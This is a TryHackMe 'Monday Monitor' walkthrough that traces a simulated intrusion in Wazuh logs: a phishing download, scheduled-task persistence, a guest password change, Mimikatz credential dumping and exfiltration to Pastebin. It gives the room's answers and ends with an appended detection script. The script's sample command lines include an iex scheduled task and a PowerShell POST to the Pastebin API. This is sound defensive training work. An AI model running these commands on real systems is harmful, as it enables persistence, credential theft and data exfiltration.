Wazuh - Monday Monitor

Discovered persistent threat on compromised endpoint with EDR (Wazuh)

By Ren Sie

Refer to Mondaymonitor for the challenge room on TryHackMe

Scenario

Swiftspend Finance, the coolest fintech company around, is enhancing its cybersecurity to protect against digital threats and keep customers safe. Led by the tech-savvy Senior Security Engineer John Sterling, Swiftspend is focusing on improving endpoint monitoring with Wazuh and Sysmon. They’ve conducted tests to evaluate their security measures, and now they need your expertise.

The tests took place on April 29, 2024, from 12:00 PM to 8:00 PM. Your task is to analyze the logs for any suspicious processes or unusual network connections. Your mission is to uncover insights and help refine Swiftspend’s defenses.

Task

Once logged in, navigate to the Security Events module and use the saved query Monday_Monitor to access the logs, and set the time range to the period given in the scenario description.

Initial access was established using a downloaded file. What is the file name saved on the host?

Given that the question referenced 'download file,' I used the term 'http' in the search head.
I identified a PowerShell script that downloads a file (SwiftSpend_Financial_Expenses.xlsm) from localhost and saves it as PhishingAttachment.xlsm in the TEMP\ directory.

What is the full command run to create a scheduled task?

To monitor the scheduled task, I utilized schtasks.exe on the search head.
I discovered that the script configures both a Windows registry entry and a scheduled task. The task is set to execute a PowerShell command daily at 12:34 PM, which decodes and executes the registry entry.

Note: schtasks.exe is a Windows utility used for creating, deleting, configuring, and displaying scheduled tasks.

What time is the scheduled task meant to run?

According to the previous screenshot, the scheduled task is set to activate daily at 12:34 PM.

What was encoded?

The previous screenshot indicates that the string is encoded in Base64 (cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=). By using CyberChef to decode this string, I obtain the original content.

What password was set for the new user account?

I utilized the search query data.win.eventdata.commandLine:*net* *user* on the search head, as the query pertained to user account modifications.
From the provided screenshots, it is evident that the 'guest' account was activated using the /activate:yes parameter. Subsequently, the command net user guest I_AM_M0NIT0R1NG was executed, setting the 'guest' account password to I_AM_M0NIT0R1NG.

Note: net.exe is a tool for managing user accounts, network resources, services, and various network settings in Windows.

What is the name of the .exe that was used to dump credentials?

Knowing that Mimikatz is a credential dumping tool, I used it in the search head.
From the output, I discovered that a script executes memotech.exe (originally named Mimikatz.exe) to analyze a memory dump file (lsass.DMP) and extract detailed logon credentials using the sekurlsa plugin commands. After the extraction of credentials, the tool terminates itself.

Data was exfiltrated from the host. What was the flag that was part of the data?

By searching for the keyword "post" in data.win.eventdata.commandLine, I discovered the only log entry indicating that the script uploads secrets and API keys to Pastebin via its API. The script configures the API key, the content to be posted, and the Pastebin API URL, then sends a POST request with this data.
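The searches above (schtasks creation, the Base64 string, net user password changes and the Pastebin POST) can be turned into a small triage script over the data.win.eventdata.commandLine field. The following is an added example, not code from the room or the author: the alerts are constructed stand-ins shaped like Wazuh's Sysmon process-creation events, and the command lines are illustrative, with the only page-derived value being the Base64 string from the scheduled-task question.

```python
import base64
import re

def alert(cmd):  # wrap a command line in the nested Wazuh/Sysmon alert shape
    return {"data": {"win": {"eventdata": {"commandLine": cmd}}}}

# Constructed sample alerts for this example; the command lines are
# illustrative and are not copied from the room's logs.
SAMPLE_ALERTS = [alert(c) for c in (
    'schtasks.exe /Create /SC DAILY /ST 12:34 /TN Sync /TR "powershell -c iex(...)"',
    "reg add HKCU\\Software\\Sync /v Payload /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=",
    "net user guest I_AM_M0NIT0R1NG",
    "powershell Invoke-WebRequest -Method POST -Uri https://pastebin.com/api/api_post.php",
    "notepad.exe notes.txt",
)]

# A run of 20+ base64 characters that is not glued to other base64 characters.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")

def command_line(alert):
    return alert.get("data", {}).get("win", {}).get("eventdata", {}).get("commandLine", "")

def decode_base64_tokens(cmd):
    """Decode base64-looking tokens: UTF-8 first, then PowerShell's UTF-16LE."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-8", "utf-16-le"):
            text = raw.decode(enc, errors="replace")
            if "\ufffd" not in text and text.isprintable():   # keep clean text only
                out.append(text)
                break
    return out

def triage(alerts):
    """Return (rule, detail) findings for the behaviours the walkthrough found."""
    findings = []
    for cmd in map(command_line, alerts):
        if re.search(r"\bschtasks(\.exe)?\s+/create\b", cmd, re.I):
            m = re.search(r"/ST\s+(\d{1,2}:\d{2})", cmd, re.I)      # task start time
            findings.append(("scheduled_task", m.group(1) if m else "?"))
        for text in decode_base64_tokens(cmd):
            findings.append(("base64_payload", text))
        m = re.search(r"\bnet(?:\.exe)?\s+user\s+(\S+)\s+([^/\s]\S*)", cmd, re.I)
        if m:                                                       # password set
            findings.append(("password_set", f"{m.group(1)}:{m.group(2)}"))
        if re.search(r"pastebin\.com/api", cmd, re.I) and re.search(r"\bpost\b", cmd, re.I):
            findings.append(("exfil_pastebin", cmd))
    return findings
```

Run triage(SAMPLE_ALERTS) to get one finding per suspicious command line; the benign notepad.exe entry produces none.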
